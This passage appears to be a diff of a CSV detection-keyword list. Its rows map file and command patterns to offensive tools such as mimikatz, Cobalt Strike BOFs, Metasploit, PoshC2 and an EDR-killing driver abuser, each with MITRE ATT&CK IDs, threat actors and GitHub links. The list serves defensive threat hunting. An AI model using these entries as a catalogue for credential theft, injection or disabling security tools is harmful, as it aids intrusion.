+"*process::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process_herpaderping*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*process_imports.cna*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports.x64*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports_api *.exe*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" -"*process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_min_alloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_startrwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_min_alloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_startrwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Process_Inject_Struct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*process_inject_transform_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_killer.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs 
/ XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*process_memdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*process_mimikatz*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*process_inject_transform_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 